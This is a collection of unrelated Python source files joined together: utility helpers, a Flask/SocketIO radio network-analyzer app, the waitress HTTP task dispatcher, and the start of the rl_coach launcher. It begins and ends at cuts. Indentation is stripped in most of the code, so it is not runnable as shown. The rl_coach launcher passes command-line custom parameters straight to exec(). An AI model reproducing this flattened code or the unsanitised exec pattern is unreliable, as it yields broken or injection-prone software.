# Try again, starting from the next port
start_port = port + 1
else:
free_range_found = True
return ports
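# Example (illustrative): reserve three consecutive free local ports, staggering
# the starting point to reduce collisions between concurrent runs.
#
#   ports = get_port_range(2200, 3, random_stagger=True)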
def profile_memory(log_path, pid):
import memory_profiler
def profile():
with open(log_path, 'w') as f:
# timeout=99999 is necessary because for external processes,
# memory_usage otherwise defaults to only returning a single sample
# Note that even with interval=1, because memory_profiler only
# flushes every 50 lines, we still have to wait 50 seconds before
# updates.
memory_profiler.memory_usage(pid, stream=f,
timeout=99999, interval=1)
p = Process(target=profile, daemon=True)
p.start()
return p
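# Example (illustrative): log this process's memory usage once per second to a
# file from a daemon child process, then stop it when the workload is done.
#
#   import os
#   profiler = profile_memory('memory.log', os.getpid())
#   ...  # run the workload
#   profiler.terminate()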
def batch_iter(data, batch_size, shuffle=False):
idxs = list(range(len(data)))
if shuffle:
np.random.shuffle(idxs) # in-place
start_idx = 0
end_idx = 0
while end_idx < len(data):
end_idx = start_idx + batch_size
if end_idx > len(data):
end_idx = len(data)
batch_idxs = idxs[start_idx:end_idx]
batch = []
for idx in batch_idxs:
batch.append(data[idx])
yield batch
start_idx += batch_size
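# Illustrative helper (added for exposition): iterate over a toy dataset in
# shuffled mini-batches; the final batch may be smaller than batch_size.
def _batch_iter_demo():
    data = list(range(10))
    for batch in batch_iter(data, batch_size=4, shuffle=True):
        print(batch)  # e.g. [3, 7, 1, 0] then [9, 2, 5, 8] then [4, 6]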
def make_env(env_id, seed=0):
if env_id in ['MovingDot-v0', 'MovingDotDiscreteNoFrameskip-v0']:
import gym_moving_dot
env = gym.make(env_id)
env.seed(seed)
if env_id == 'EnduroNoFrameskip-v4':
from enduro_wrapper import EnduroWrapper
env = EnduroWrapper(env)
return wrap_deepmind(env)
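# Example (illustrative; assumes gym with Atari support and the bundled a2c
# wrappers are installed):
#
#   env = make_env('PongNoFrameskip-v4', seed=0)
#   obs = env.reset()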
|
sna.py
|
from __future__ import print_function
import time
import threading
from pyLMS7002Soapy import pyLMS7002Soapy as pyLMSS
from flask import Flask, request
from flask_socketio import SocketIO
import webbrowser
from SingleToneSweeper import SingleToneSweeper
class SNA:
RUN_MODE_OFF = 0
RUN_MODE_ON = 1
RUN_MODE_UPDATE_CONFIG = 2
thread = None
socketio = None
sweeper = None
snaRunMode = RUN_MODE_OFF
snaSampleRate = 20e6
snaStartFreq = 400e6
snaEndFreq = 500e6
snaNumSteps = 40
snaRxGain = 20
snaTxGain = 20
def __init__(self):
app = Flask(__name__, static_url_path='/static')
self.socketio = SocketIO(app, async_mode='gevent')
thread = threading.Thread(target=self.snaThread)
thread.start()
@app.route('/')
def root():
return app.send_static_file('index.html')
@self.socketio.on('connect')
def connect():
self.socketio.emit('config', {
'sampleRate': self.snaSampleRate,
'startFreq': self.snaStartFreq,
'endFreq': self.snaEndFreq,
'numSteps': self.snaNumSteps,
'rxGain': self.snaRxGain,
'txGain': self.snaTxGain,
'runMode': self.snaRunMode
})
@self.socketio.on('config')
def handle_json(json):
self.snaSampleRate = int(json['sampleRate'])
self.snaStartFreq = int(json['startFreq'])
self.snaEndFreq = int(json['endFreq'])
self.snaNumSteps = int(json['numSteps'])
self.snaRxGain = int(json['rxGain'])
self.snaTxGain = int(json['txGain'])
self.snaRunMode = int(json['runMode'])
if ((self.snaRunMode!=self.RUN_MODE_ON) and (self.sweeper is not None)):
self.sweeper.abortSweep()
self.socketio.run(app, port=55555)
def sweepStart(self, startFreq, freqStep, stepCnt):
self.socketio.emit('sweepStart', {
'freqMin': startFreq,
'freqStep': freqStep,
'stepCnt': stepCnt
})
def sweepResult(self, index, pwr):
self.socketio.emit('data', {
'x': index,
'y': pwr
})
self.socketio.sleep(0)
def snaThread(self):
radio = pyLMSS.pyLMS7002Soapy(0)
self.sweeper = SingleToneSweeper(radio, self)
webbrowser.open("http://127.0.0.1:55555", new=1)
while True:
if (self.snaRunMode==self.RUN_MODE_OFF):
time.sleep(0.1)
continue
elif (self.snaRunMode==self.RUN_MODE_UPDATE_CONFIG):
self.snaRunMode = self.RUN_MODE_ON
start = time.time()
self.sweeper.setGain(self.snaRxGain, self.snaTxGain)
self.sweeper.setSampleRate(self.snaSampleRate)
self.sweeper.sweep(self.snaStartFreq, self.snaEndFreq, self.snaNumSteps)
end = time.time()
print(end - start)
if __name__ == '__main__':
SNA()
|
task.py
|
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
import socket
import sys
import threading
import time
from collections import deque
from .buffers import ReadOnlyFileBasedBuffer
from .compat import reraise, tobytes
from .utilities import build_http_date, logger, queue_logger
rename_headers = { # or keep them without the HTTP_ prefix added
"CONTENT_LENGTH": "CONTENT_LENGTH",
"CONTENT_TYPE": "CONTENT_TYPE",
}
hop_by_hop = frozenset(
(
"connection",
"keep-alive",
"proxy-authenticate",
"proxy-authorization",
"te",
"trailers",
"transfer-encoding",
"upgrade",
)
)
class ThreadedTaskDispatcher(object):
"""A Task Dispatcher that creates a thread for each task.
"""
stop_count = 0 # Number of threads that will stop soon.
active_count = 0 # Number of currently active threads
logger = logger
queue_logger = queue_logger
def __init__(self):
self.threads = set()
self.queue = deque()
self.lock = threading.Lock()
self.queue_cv = threading.Condition(self.lock)
self.thread_exit_cv = threading.Condition(self.lock)
def start_new_thread(self, target, thread_no):
t = threading.Thread(
target=target, name="waitress-{}".format(thread_no), args=(thread_no,)
)
t.daemon = True
t.start()
def handler_thread(self, thread_no):
while True:
with self.lock:
while not self.queue and self.stop_count == 0:
# Mark ourselves as idle before waiting to be
# woken up, then we will once again be active
self.active_count -= 1
self.queue_cv.wait()
self.active_count += 1
if self.stop_count > 0:
self.active_count -= 1
self.stop_count -= 1
self.threads.discard(thread_no)
self.thread_exit_cv.notify()
break
task = self.queue.popleft()
try:
task.service()
except BaseException:
self.logger.exception("Exception when servicing %r", task)
def set_thread_count(self, count):
with self.lock:
threads = self.threads
thread_no = 0
running = len(threads) - self.stop_count
while running < count:
# Start threads.
while thread_no in threads:
thread_no = thread_no + 1
threads.add(thread_no)
running += 1
self.start_new_thread(self.handler_thread, thread_no)
self.active_count += 1
thread_no = thread_no + 1
if running > count:
# Stop threads.
self.stop_count += running - count
self.queue_cv.notify_all()
def add_task(self, task):
with self.lock:
self.queue.append(task)
self.queue_cv.notify()
queue_size = len(self.queue)
idle_threads = len(self.threads) - self.stop_count - self.active_count
if queue_size > idle_threads:
self.queue_logger.warning(
"Task queue depth is %d", queue_size - idle_threads
)
def shutdown(self, cancel_pending=True, timeout=5):
self.set_thread_count(0)
# Ensure the threads shut down.
threads = self.threads
expiration = time.time() + timeout
with self.lock:
while threads:
if time.time() >= expiration:
self.logger.warning("%d thread(s) still running", len(threads))
break
self.thread_exit_cv.wait(0.1)
if cancel_pending:
# Cancel remaining tasks.
queue = self.queue
if len(queue) > 0:
self.logger.warning("Canceling %d pending task(s)", len(queue))
while queue:
task = queue.popleft()
task.cancel()
self.queue_cv.notify_all()
return True
return False
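# Usage sketch (illustrative only; waitress normally drives the dispatcher from
# its server loop): start a small worker pool, hand it objects exposing
# service() and cancel(), then shut it down.
#
#   dispatcher = ThreadedTaskDispatcher()
#   dispatcher.set_thread_count(4)
#   dispatcher.add_task(some_task)   # some_task.service() runs on a worker thread
#   dispatcher.shutdown(cancel_pending=True, timeout=5)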
class Task(object):
close_on_finish = False
status = "200 OK"
wrote_header = False
start_time = 0
content_length = None
content_bytes_written = 0
logged_write_excess = False
logged_write_no_body = False
complete = False
chunked_response = False
logger = logger
def __init__(self, channel, request):
self.channel = channel
self.request = request
self.response_headers = []
version = request.version
if version not in ("1.0", "1.1"):
# fall back to a version we support.
version = "1.0"
self.version = version
def service(self):
try:
try:
self.start()
self.execute()
self.finish()
except socket.error:
self.close_on_finish = True
if self.channel.adj.log_socket_errors:
raise
finally:
pass
@property
def has_body(self):
return not (
self.status.startswith("1")
or self.status.startswith("204")
or self.status.startswith("304")
)
def build_response_header(self):
version = self.version
# Figure out whether the connection should be closed.
connection = self.request.headers.get("CONNECTION", "").lower()
response_headers = []
content_length_header = None
date_header = None
server_header = None
connection_close_header = None
for (headername, headerval) in self.response_headers:
headername = "-".join([x.capitalize() for x in headername.split("-")])
if headername == "Content-Length":
if self.has_body:
content_length_header = headerval
else:
continue # pragma: no cover
if headername == "Date":
date_header = headerval
if headername == "Server":
server_header = headerval
if headername == "Connection":
connection_close_header = headerval.lower()
# replace with properly capitalized version
response_headers.append((headername, headerval))
if (
content_length_header is None
and self.content_length is not None
and self.has_body
):
content_length_header = str(self.content_length)
response_headers.append(("Content-Length", content_length_header))
def close_on_finish():
if connection_close_header is None:
response_headers.append(("Connection", "close"))
self.close_on_finish = True
if version == "1.0":
if connection == "keep-alive":
if not content_length_header:
close_on_finish()
else:
response_headers.append(("Connection", "Keep-Alive"))
else:
close_on_finish()
elif version == "1.1":
if connection == "close":
close_on_finish()
if not content_length_header:
# RFC 7230: MUST NOT send Transfer-Encoding or Content-Length
# for any response with a status code of 1xx, 204 or 304.
if self.has_body:
response_headers.append(("Transfer-Encoding", "chunked"))
self.chunked_response = True
if not self.close_on_finish:
close_on_finish()
# under HTTP 1.1 keep-alive is default, no need to set the header
else:
raise AssertionError("neither HTTP/1.0 or HTTP/1.1")
# Set the Server and Date field, if not yet specified. This is needed
# if the server is used as a proxy.
ident = self.channel.server.adj.ident
if not server_header:
if ident:
response_headers.append(("Server", ident))
else:
response_headers.append(("Via", ident or "waitress"))
if not date_header:
response_headers.append(("Date", build_http_date(self.start_time)))
self.response_headers = response_headers
first_line = "HTTP/%s %s" % (self.version, self.status)
# NB: sorting headers needs to preserve same-named-header order
# as per RFC 2616 section 4.2; thus the key=lambda x: x[0] here;
# rely on stable sort to keep relative position of same-named headers
next_lines = [
"%s: %s" % hv for hv in sorted(self.response_headers, key=lambda x: x[0])
]
lines = [first_line] + next_lines
res = "%s\r\n\r\n" % "\r\n".join(lines)
return tobytes(res)
def remove_content_length_header(self):
response_headers = []
for header_name, header_value in self.response_headers:
if header_name.lower() == "content-length":
continue # pragma: nocover
response_headers.append((header_name, header_value))
self.response_headers = response_headers
def start(self):
self.start_time = time.time()
def finish(self):
if not self.wrote_header:
self.write(b"")
if self.chunked_response:
# not self.write, it will chunk it!
self.channel.write_soon(b"0\r\n\r\n")
def write(self, data):
if not self.complete:
raise RuntimeError("start_response was not called before body written")
channel = self.channel
if not self.wrote_header:
rh = self.build_response_header()
channel.write_soon(rh)
self.wrote_header = True
if data and self.has_body:
towrite = data
cl = self.content_length
if self.chunked_response:
# use chunked encoding response
towrite = tobytes(hex(len(data))[2:].upper()) + b"\r\n"
towrite += data + b"\r\n"
elif cl is not None:
towrite = data[: cl - self.content_bytes_written]
self.content_bytes_written += len(towrite)
if towrite != data and not self.logged_write_excess:
self.logger.warning(
"application-written content exceeded the number of "
"bytes specified by Content-Length header (%s)" % cl
)
self.logged_write_excess = True
if towrite:
channel.write_soon(towrite)
elif data:
# Cheat, and tell the application we have written all of the bytes,
# even though the response shouldn't have a body and we are
# ignoring it entirely.
self.content_bytes_written += len(data)
if not self.logged_write_no_body:
self.logger.warning(
"application-written content was ignored due to HTTP "
"response that may not contain a message-body: (%s)" % self.status
)
self.logged_write_no_body = True
class ErrorTask(Task):
""" An error task produces an error response
"""
complete = True
def execute(self):
e = self.request.error
status, headers, body = e.to_response()
self.status = status
self.response_headers.extend(headers)
# We need to explicitly tell the remote client we are closing the
# connection, because self.close_on_finish is set, and we are going to
# slam the door in the client's face.
self.response_headers.append(("Connection", "close"))
self.close_on_finish = True
self.content_length = len(body)
self.write(tobytes(body))
class WSGITask(Task):
"""A WSGI task produces a response from a WSGI application.
"""
environ = None
def execute(self):
environ = self.get_environment()
def start_response(status, headers, exc_info=None):
if self.complete and not exc_info:
raise AssertionError(
"start_response called a second time without providing exc_info."
)
if exc_info:
try:
if self.wrote_header:
# higher levels will catch and handle raised exception:
# 1. "service" method in task.py
# 2. "service" method in channel.py
# 3. "handler_thread" method in task.py
reraise(exc_info[0], exc_info[1], exc_info[2])
else:
# As per WSGI spec existing headers must be cleared
self.response_headers = []
finally:
exc_info = None
self.complete = True
if not status.__class__ is str:
raise AssertionError("status %s is not a string" % status)
if "\n" in status or "\r" in status:
raise ValueError(
"carriage return/line feed character present in status"
)
self.status = status
# Prepare the headers for output
for k, v in headers:
if not k.__class__ is str:
raise AssertionError(
"Header name %r is not a string in %r" % (k, (k, v))
)
if not v.__class__ is str:
raise AssertionError(
"Header value %r is not a string in %r" % (v, (k, v))
)
if "\n" in v or "\r" in v:
raise ValueError(
"carriage return/line feed character present in header value"
)
if "\n" in k or "\r" in k:
raise ValueError(
"carriage return/line feed character present in header name"
)
kl = k.lower()
if kl == "content-length":
self.content_length = int(v)
elif kl in hop_by_hop:
raise AssertionError(
'%s is a "hop-by-hop" header; it cannot be used by '
"a WSGI application (see PEP 3333)" % k
)
self.response_headers.extend(headers)
# Return a method used to write the response data.
return self.write
# Call the application to handle the request and write a response
app_iter = self.channel.server.application(environ, start_response)
can_close_app_iter = True
try:
if app_iter.__class__ is ReadOnlyFileBasedBuffer:
cl = self.content_length
size = app_iter.prepare(cl)
if size:
if cl != size:
if cl is not None:
self.remove_content_length_header()
self.content_length = size
self.write(b"") # generate headers
# if the write_soon below succeeds then the channel will
# take over closing the underlying file via the channel's
# _flush_some or handle_close so we intentionally avoid
# calling close in the finally block
self.channel.write_soon(app_iter)
can_close_app_iter = False
return
first_chunk_len = None
for chunk in app_iter:
if first_chunk_len is None:
first_chunk_len = len(chunk)
# Set a Content-Length header if one is not supplied.
# start_response may not have been called until first
# iteration as per PEP, so we must reinterrogate
# self.content_length here
if self.content_length is None:
app_iter_len = None
if hasattr(app_iter, "__len__"):
app_iter_len = len(app_iter)
if app_iter_len == 1:
self.content_length = first_chunk_len
# transmit headers only after first iteration of the iterable
# that returns a non-empty bytestring (PEP 3333)
if chunk:
self.write(chunk)
cl = self.content_length
if cl is not None:
if self.content_bytes_written != cl:
# close the connection so the client isn't sitting around
# waiting for more data when there are too few bytes
# to service content-length
self.close_on_finish = True
if self.request.command != "HEAD":
self.logger.warning(
"application returned too few bytes (%s) "
"for specified Content-Length (%s) via app_iter"
% (self.content_bytes_written, cl),
)
finally:
if can_close_app_iter and hasattr(app_iter, "close"):
app_iter.close()
def get_environment(self):
"""Returns a WSGI environment."""
environ = self.environ
if environ is not None:
# Return the cached copy.
return environ
request = self.request
path = request.path
channel = self.channel
server = channel.server
url_prefix = server.adj.url_prefix
if path.startswith("/"):
# strip extra slashes at the beginning of a path that starts
# with any number of slashes
path = "/" + path.lstrip("/")
if url_prefix:
# NB: url_prefix is guaranteed by the configuration machinery to
# be either the empty string or a string that starts with a single
# slash and ends without any slashes
if path == url_prefix:
# if the path is the same as the url prefix, the SCRIPT_NAME
# should be the url_prefix and PATH_INFO should be empty
path = ""
else:
# if the path starts with the url prefix plus a slash,
# the SCRIPT_NAME should be the url_prefix and PATH_INFO should
# the value of path from the slash until its end
url_prefix_with_trailing_slash = url_prefix + "/"
if path.startswith(url_prefix_with_trailing_slash):
path = path[len(url_prefix) :]
environ = {
"REMOTE_ADDR": channel.addr[0],
# Nah, we aren't actually going to look up the reverse DNS for
# REMOTE_ADDR, but we will happily set this environment variable
# for the WSGI application. Spec says we can just set this to
# REMOTE_ADDR, so we do.
"REMOTE_HOST": channel.addr[0],
# try and set the REMOTE_PORT to something useful, but maybe None
"REMOTE_PORT": str(channel.addr[1]),
"REQUEST_METHOD": request.command.upper(),
"SERVER_PORT": str(server.effective_port),
"SERVER_NAME": server.server_name,
"SERVER_SOFTWARE": server.adj.ident,
"SERVER_PROTOCOL": "HTTP/%s" % self.version,
"SCRIPT_NAME": url_prefix,
"PATH_INFO": path,
"QUERY_STRING": request.query,
"wsgi.url_scheme": request.url_scheme,
# the following environment variables are required by the WSGI spec
"wsgi.version": (1, 0),
# apps should use the logging module
"wsgi.errors": sys.stderr,
"wsgi.multithread": True,
"wsgi.multiprocess": False,
"wsgi.run_once": False,
"wsgi.input": request.get_body_stream(),
"wsgi.file_wrapper": ReadOnlyFileBasedBuffer,
"wsgi.input_terminated": True, # wsgi.input is EOF terminated
}
for key, value in dict(request.headers).items():
value = value.strip()
mykey = rename_headers.get(key, None)
if mykey is None:
mykey = "HTTP_" + key
if mykey not in environ:
environ[mykey] = value
# cache the environ for this request
self.environ = environ
return environ
|
coach.py
|
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
sys.path.append('.')
import copy
from configparser import ConfigParser, Error
from rl_coach.core_types import EnvironmentSteps
import os
from rl_coach import logger
import traceback
from rl_coach.logger import screen, failed_imports
import argparse
import atexit
import time
import sys
import json
from rl_coach.base_parameters import Frameworks, VisualizationParameters, TaskParameters, DistributedTaskParameters, \
RunType, DistributedCoachSynchronizationType
from multiprocessing import Process
from multiprocessing.managers import BaseManager
import subprocess
from rl_coach.graph_managers.graph_manager import HumanPlayScheduleParameters, GraphManager
from rl_coach.utils import list_all_presets, short_dynamic_import, get_open_port, SharedMemoryScratchPad, get_base_dir
from rl_coach.graph_managers.basic_rl_graph_manager import BasicRLGraphManager
from rl_coach.environments.environment import SingleLevelSelection
from rl_coach.memories.backend.redis import RedisPubSubMemoryBackendParameters
from rl_coach.memories.backend.memory_impl import construct_memory_params
from rl_coach.data_stores.data_store import DataStoreParameters
from rl_coach.data_stores.s3_data_store import S3DataStoreParameters
from rl_coach.data_stores.nfs_data_store import NFSDataStoreParameters
from rl_coach.data_stores.data_store_impl import get_data_store, construct_data_store_params
from rl_coach.training_worker import training_worker
from rl_coach.rollout_worker import rollout_worker, wait_for_checkpoint
if len(set(failed_imports)) > 0:
screen.warning("Warning: failed to import the following packages - {}".format(', '.join(set(failed_imports))))
def add_items_to_dict(target_dict, source_dict):
updated_task_parameters = copy.copy(source_dict)
updated_task_parameters.update(target_dict)
return updated_task_parameters
def open_dashboard(experiment_path):
"""
open X11 based dashboard in a new process (nonblocking)
"""
dashboard_path = 'python {}/dashboard.py'.format(get_base_dir())
cmd = "{} --experiment_dir {}".format(dashboard_path, experiment_path)
screen.log_title("Opening dashboard - experiment path: {}".format(experiment_path))
# subprocess.Popen(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, shell=True, executable="/bin/bash")
subprocess.Popen(cmd, shell=True, executable="/bin/bash")
def start_graph(graph_manager: 'GraphManager', task_parameters: 'TaskParameters'):
"""
Runs the graph_manager using the configured task_parameters.
This stand-alone method is a convenience for multiprocessing.
"""
graph_manager.create_graph(task_parameters)
# let the adventure begin
if task_parameters.evaluate_only is not None:
steps_to_evaluate = task_parameters.evaluate_only if task_parameters.evaluate_only > 0 \
else sys.maxsize
graph_manager.evaluate(EnvironmentSteps(steps_to_evaluate))
else:
graph_manager.improve()
graph_manager.close()
def handle_distributed_coach_tasks(graph_manager, args, task_parameters):
ckpt_inside_container = "/checkpoint"
memory_backend_params = None
if args.memory_backend_params:
memory_backend_params = json.loads(args.memory_backend_params)
memory_backend_params['run_type'] = str(args.distributed_coach_run_type)
graph_manager.agent_params.memory.register_var('memory_backend_params', construct_memory_params(memory_backend_params))
data_store_params = None
if args.data_store_params:
data_store_params = construct_data_store_params(json.loads(args.data_store_params))
data_store_params.expt_dir = args.experiment_path
data_store_params.checkpoint_dir = ckpt_inside_container
graph_manager.data_store_params = data_store_params
if args.distributed_coach_run_type == RunType.TRAINER:
task_parameters.checkpoint_save_dir = ckpt_inside_container
training_worker(
graph_manager=graph_manager,
task_parameters=task_parameters,
is_multi_node_test=args.is_multi_node_test
)
if args.distributed_coach_run_type == RunType.ROLLOUT_WORKER:
task_parameters.checkpoint_restore_dir = ckpt_inside_container
data_store = None
if args.data_store_params:
data_store = get_data_store(data_store_params)
rollout_worker(
graph_manager=graph_manager,
data_store=data_store,
num_workers=args.num_workers,
task_parameters=task_parameters
)
def handle_distributed_coach_orchestrator(args):
from rl_coach.orchestrators.kubernetes_orchestrator import KubernetesParameters, Kubernetes, \
RunTypeParameters
ckpt_inside_container = "/checkpoint"
arg_list = sys.argv[1:]
try:
i = arg_list.index('--distributed_coach_run_type')
arg_list.pop(i)
arg_list.pop(i)
except ValueError:
pass
trainer_command = ['python3', 'rl_coach/coach.py', '--distributed_coach_run_type', str(RunType.TRAINER)] + arg_list
rollout_command = ['python3', 'rl_coach/coach.py', '--distributed_coach_run_type', str(RunType.ROLLOUT_WORKER)] + arg_list
if '--experiment_name' not in rollout_command:
rollout_command = rollout_command + ['--experiment_name', args.experiment_name]
if '--experiment_name' not in trainer_command:
trainer_command = trainer_command + ['--experiment_name', args.experiment_name]
memory_backend_params = None
if args.memory_backend == "redispubsub":
memory_backend_params = RedisPubSubMemoryBackendParameters()
ds_params_instance = None
if args.data_store == "s3":
ds_params = DataStoreParameters("s3", "", "")
ds_params_instance = S3DataStoreParameters(ds_params=ds_params, end_point=args.s3_end_point, bucket_name=args.s3_bucket_name,
creds_file=args.s3_creds_file, checkpoint_dir=ckpt_inside_container, expt_dir=args.experiment_path)
elif args.data_store == "nfs":
ds_params = DataStoreParameters("nfs", "kubernetes", "")
ds_params_instance = NFSDataStoreParameters(ds_params)
worker_run_type_params = RunTypeParameters(args.image, rollout_command, run_type=str(RunType.ROLLOUT_WORKER), num_replicas=args.num_workers)
trainer_run_type_params = RunTypeParameters(args.image, trainer_command, run_type=str(RunType.TRAINER))
orchestration_params = KubernetesParameters([worker_run_type_params, trainer_run_type_params],
kubeconfig='~/.kube/config',
memory_backend_parameters=memory_backend_params,
data_store_params=ds_params_instance)
orchestrator = Kubernetes(orchestration_params)
if not orchestrator.setup():
print("Could not setup.")
return 1
if orchestrator.deploy_trainer():
print("Successfully deployed trainer.")
else:
print("Could not deploy trainer.")
return 1
if orchestrator.deploy_worker():
print("Successfully deployed rollout worker(s).")
else:
print("Could not deploy rollout worker(s).")
return 1
if args.dump_worker_logs:
screen.log_title("Dumping rollout worker logs in: {}".format(args.experiment_path))
orchestrator.worker_logs(path=args.experiment_path)
exit_code = 1
try:
exit_code = orchestrator.trainer_logs()
except KeyboardInterrupt:
pass
orchestrator.undeploy()
return exit_code
class CoachLauncher(object):
"""
This class is responsible for gathering all user-specified configuration options, parsing them,
instantiating a GraphManager and then starting that GraphManager with either improve() or evaluate().
This class is also responsible for launching multiple processes.
It is structured so that it can be sub-classed to provide alternate mechanisms to configure and launch
Coach jobs.
The key entry-point for this class is the .launch() method which is expected to be called from __main__
and handle absolutely everything for a job.
"""
def launch(self):
"""
Main entry point for the class, and the standard way to run coach from the command line.
Parses command-line arguments through argparse, instantiates a GraphManager and then runs it.
"""
parser = self.get_argument_parser()
args = self.get_config_args(parser)
graph_manager = self.get_graph_manager_from_args(args)
self.run_graph_manager(graph_manager, args)
def get_graph_manager_from_args(self, args: argparse.Namespace) -> 'GraphManager':
"""
Return the graph manager according to the command line arguments given by the user.
:param args: the arguments given by the user
:return: the graph manager, not bound to task_parameters yet.
"""
graph_manager = None
# if a preset was given we will load the graph manager for the preset
if args.preset is not None:
graph_manager = short_dynamic_import(args.preset, ignore_module_case=True)
# for human play we need to create a custom graph manager
if args.play:
from rl_coach.agents.human_agent import HumanAgentParameters
env_params = short_dynamic_import(args.environment_type, ignore_module_case=True)()
env_params.human_control = True
schedule_params = HumanPlayScheduleParameters()
graph_manager = BasicRLGraphManager(HumanAgentParameters(), env_params, schedule_params, VisualizationParameters())
# Set framework
# Note: Some graph managers (e.g. HAC preset) create multiple agents and the attribute is called agents_params
if hasattr(graph_manager, 'agent_params'):
for network_parameters in graph_manager.agent_params.network_wrappers.values():
network_parameters.framework = args.framework
elif hasattr(graph_manager, 'agents_params'):
for ap in graph_manager.agents_params:
for network_parameters in ap.network_wrappers.values():
network_parameters.framework = args.framework
if args.level:
if isinstance(graph_manager.env_params.level, SingleLevelSelection):
graph_manager.env_params.level.select(args.level)
else:
graph_manager.env_params.level = args.level
# set the seed for the environment
if args.seed is not None:
graph_manager.env_params.seed = args.seed
# visualization
graph_manager.visualization_parameters.dump_gifs = graph_manager.visualization_parameters.dump_gifs or args.dump_gifs
graph_manager.visualization_parameters.dump_mp4 = graph_manager.visualization_parameters.dump_mp4 or args.dump_mp4
graph_manager.visualization_parameters.render = args.render
graph_manager.visualization_parameters.tensorboard = args.tensorboard
graph_manager.visualization_parameters.print_networks_summary = args.print_networks_summary
# update the custom parameters
if args.custom_parameter is not None:
unstripped_key_value_pairs = [pair.split('=') for pair in args.custom_parameter.split(';')]
stripped_key_value_pairs = [tuple([pair[0].strip(), pair[1].strip()]) for pair in
unstripped_key_value_pairs if len(pair) == 2]
# load custom parameters into run_dict
for key, value in stripped_key_value_pairs:
exec("graph_manager.{}={}".format(key, value))
return graph_manager
def display_all_presets_and_exit(self):
# list available presets
screen.log_title("Available Presets:")
for preset in sorted(list_all_presets()):
print(preset)
sys.exit(0)
def expand_preset(self, preset):
"""
Replace a short preset name with the full python path, and verify that it can be imported.
"""
if preset.lower() in [p.lower() for p in list_all_presets()]:
preset = "{}.py:graph_manager".format(os.path.join(get_base_dir(), 'presets', preset))
else:
preset = "{}".format(preset)
# if a graph manager variable was not specified, try the default of :graph_manager
if len(preset.split(":")) == 1:
preset += ":graph_manager"
# verify that the preset exists
preset_path = preset.split(":")[0]
if not os.path.exists(preset_path):
screen.error("The given preset ({}) cannot be found.".format(preset))
# verify that the preset can be instantiated
try:
short_dynamic_import(preset, ignore_module_case=True)
except TypeError as e:
traceback.print_exc()
screen.error('Internal Error: ' + str(e) + "\n\nThe given preset ({}) cannot be instantiated."
.format(preset))
return preset
def get_config_args(self, parser: argparse.ArgumentParser) -> argparse.Namespace:
"""
Returns a Namespace object with all the user-specified configuration options needed to launch.
This implementation uses argparse to take arguments from the CLI, but this can be overridden by
another method that gets its configuration from elsewhere. An equivalent method however must
return an identically structured Namespace object, which conforms to the structure defined by
get_argument_parser.
This method parses the arguments that the user entered, does some basic validation, and
modification of user-specified values in short form to be more explicit.
:param parser: a parser object which implicitly defines the format of the Namespace that
is expected to be returned.
:return: the parsed arguments as a Namespace
"""
args = parser.parse_args()
if args.nocolor:
screen.set_use_colors(False)
# if no arg is given
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
# list available presets
if args.list:
self.display_all_presets_and_exit()
# Read args from config file for distributed Coach.
if args.distributed_coach and args.distributed_coach_run_type == RunType.ORCHESTRATOR:
coach_config = ConfigParser({
'image': '',
'memory_backend': 'redispubsub',
'data_store': 's3',
's3_end_point': 's3.amazonaws.com',
's3_bucket_name': '',
's3_creds_file': ''
})
try:
coach_config.read(args.distributed_coach_config_path)
args.image = coach_config.get('coach', 'image')
args.memory_backend = coach_config.get('coach', 'memory_backend')
args.data_store = coach_config.get('coach', 'data_store')
if args.data_store == 's3':
args.s3_end_point = coach_config.get('coach', 's3_end_point')
args.s3_bucket_name = coach_config.get('coach', 's3_bucket_name')
args.s3_creds_file = coach_config.get('coach', 's3_creds_file')
except Error as e:
screen.error("Error when reading distributed Coach config file: {}".format(e))
if args.image == '':
screen.error("Image cannot be empty.")
data_store_choices = ['s3', 'nfs']
if args.data_store not in data_store_choices:
screen.warning("{} data store is unsupported.".format(args.data_store))
screen.error("Supported data stores are {}.".format(data_store_choices))
memory_backend_choices = ['redispubsub']
if args.memory_backend not in memory_backend_choices:
screen.warning("{} memory backend is not supported.".format(args.memory_backend))
screen.error("Supported memory backends are {}.".format(memory_backend_choices))
if args.data_store == 's3':
if args.s3_bucket_name == '':
screen.error("S3 bucket name cannot be empty.")
if args.s3_creds_file == '':
args.s3_creds_file = None
if args.play and args.distributed_coach:
screen.error("Playing is not supported in distributed Coach.")
# replace a short preset name with the full path
if args.preset is not None:
args.preset = self.expand_preset(args.preset)
# validate the checkpoints args
if args.checkpoint_restore_dir is not None and not os.path.exists(args.checkpoint_restore_dir):
screen.error("The requested checkpoint folder to load from does not exist.")
# no preset was given. check if the user requested to play some environment on its own
if args.preset is None and args.play and not args.environment_type:
screen.error('When no preset is given for Coach to run, and the user requests human control over '
'the environment, the user is expected to input the desired environment_type and level.'
'\nAt least one of these parameters was not given.')
elif args.preset and args.play:
screen.error("Both the --preset and the --play flags were set. These flags can not be used together. "
"For human control, please use the --play flag together with the environment type flag (-et)")
elif args.preset is None and not args.play:
screen.error("Please choose a preset using the -p flag or use the --play flag together with choosing an "
"environment type (-et) in order to play the game.")
# get experiment name and path
args.experiment_name = logger.get_experiment_name(args.experiment_name)
args.experiment_path = logger.get_experiment_path(args.experiment_name)
if args.play and args.num_workers > 1:
screen.warning("Playing the game as a human is only available with a single worker. "
"The number of workers will be reduced to 1")
args.num_workers = 1
args.framework = Frameworks[args.framework.lower()]
# checkpoints
args.checkpoint_save_dir = os.path.join(args.experiment_path, 'checkpoint') if args.checkpoint_save_secs is not None else None
if args.export_onnx_graph and not args.checkpoint_save_secs:
